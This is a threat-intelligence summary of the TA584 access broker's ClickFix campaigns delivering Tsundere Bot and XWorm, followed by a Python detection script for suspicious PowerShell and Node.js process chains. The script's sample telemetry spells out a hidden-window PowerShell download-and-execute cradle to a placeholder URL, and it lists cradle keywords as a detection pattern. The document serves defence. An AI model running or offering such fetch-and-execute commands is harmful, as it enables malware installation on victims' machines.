Initial access broker TA584 has escalated its operations, using hundreds of compromised aged accounts, sent through SendGrid and Amazon SES, to deliver geofenced redirect chains that funnel victims through CAPTCHA and ClickFix pages and have them run PowerShell loaders that deploy Tsundere Bot or XWorm in memory. Tsundere Bot is a Node.js-based malware-as-a-service that retrieves its C2 address via the Ethereum blockchain, communicates over WebSockets, checks the system locale to avoid CIS-language hosts, and supports data collection, lateral movement, SOCKS proxying and a built-in bot marketplace; it is assessed as likely to enable ransomware follow-on activity. #TA584 #TsundereBot
Key points
- TA584 significantly increased activity in late 2025 and expanded targeting beyond North America and the UK to Germany, other European countries, and Australia.
- The attack chain uses compromised aged accounts, SendGrid/Amazon SES delivery, unique URLs, geofencing, IP filtering, and TDS redirect chains such as Keitaro.
- Targets who pass filters are shown a CAPTCHA and ClickFix page that instructs them to run a PowerShell command, which fetches an obfuscated script that loads XWorm or Tsundere Bot in memory.
- Tsundere Bot is a MaaS that requires Node.js, retrieves C2 addresses from the Ethereum blockchain (with a hardcoded fallback), executes JavaScript from C2, and can turn hosts into SOCKS proxies.
- Proofpoint has observed TA584 deploy many payloads (e.g., Ursnif, LDR4, WarmCookie, Xeno RAT, Cobalt Strike, DCRAT) and expects the actor to continue experimenting and expanding targets, increasing ransomware risk.
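The chain above ends with a user pasting a PowerShell command from a ClickFix page, which then fetches a script and, for Tsundere Bot, brings up Node.js. That final step is the part a defender can see in endpoint telemetry. The following is an added example of heuristic detection logic (not code from Proofpoint or from the report) run over a few constructed Sysmon-style process-creation events; the parent/child pairs, the scoring weights, the threshold and the placeholder URL are all assumptions chosen for illustration, not indicators from the report.

```python
"""Heuristic detection of ClickFix-style PowerShell loader activity in
process-creation telemetry (Sysmon Event ID 1 style fields).

Added example: constructed events and heuristics, not the report's own data.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Constructed sample telemetry (assumption: Sysmon-like field content).
SAMPLE_EVENTS = [
    # User pasted a ClickFix command into the Run dialog (explorer.exe parent).
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -nop -c "iex (irm https://placeholder.invalid/verify)"'),
    # Loader then starts Node.js to run the fetched bot (Tsundere Bot needs Node.js).
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Users\user\AppData\Local\node\node.exe",
              r"node.exe C:\Users\user\AppData\Local\Temp\index.js"),
    # Benign: developer tooling running a local build script.
    ProcEvent(r"C:\Program Files\Microsoft VS Code\Code.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -NoProfile -ExecutionPolicy Bypass -File build.ps1"),
    # Benign: ordinary interactive launch.
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\notepad.exe",
              "notepad.exe notes.txt"),
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Parents that indicate a human typed/pasted the command (Run dialog, browsers).
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Download-and-execute cradle verbs commonly pasted from ClickFix pages.
DOWNLOAD_CRADLE = re.compile(
    r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b",
    re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)

ALERT_THRESHOLD = 3  # assumption: tune against your own baseline


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def analyze(ev: ProcEvent):
    """Return (score, reasons) for one process-creation event."""
    image, parent, cmd = basename(ev.image), basename(ev.parent_image), ev.command_line
    score, reasons = 0, []
    if image in POWERSHELL:
        if parent in INTERACTIVE_PARENTS:
            score += 1
            reasons.append(f"PowerShell launched from interactive parent {parent}")
        if HIDDEN_WINDOW.search(cmd):
            score += 1
            reasons.append("hidden window requested")
        if DOWNLOAD_CRADLE.search(cmd):
            score += 2
            reasons.append("remote download-and-execute cradle in command line")
    elif image == "node.exe" and parent in POWERSHELL:
        score += 3
        reasons.append("node.exe spawned by PowerShell (Tsundere Bot depends on Node.js)")
    return score, reasons


def find_suspicious(events, threshold: int = ALERT_THRESHOLD):
    """Return alert records for events scoring at or above the threshold."""
    hits = []
    for ev in events:
        score, reasons = analyze(ev)
        if score >= threshold:
            hits.append({"image": basename(ev.image), "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(f"[score {hit['score']}] {hit['image']}: " + "; ".join(hit["reasons"]))
```

The two benign events score zero because neither combines an interactive parent with a hidden window and a remote cradle, and no Node.js process is spawned from PowerShell. In production this logic belongs in the SIEM or EDR query language rather than a script, but the same three signals (interactive parent, hidden window, download cradle) plus the PowerShell-to-node.exe parent/child relationship are what to key on.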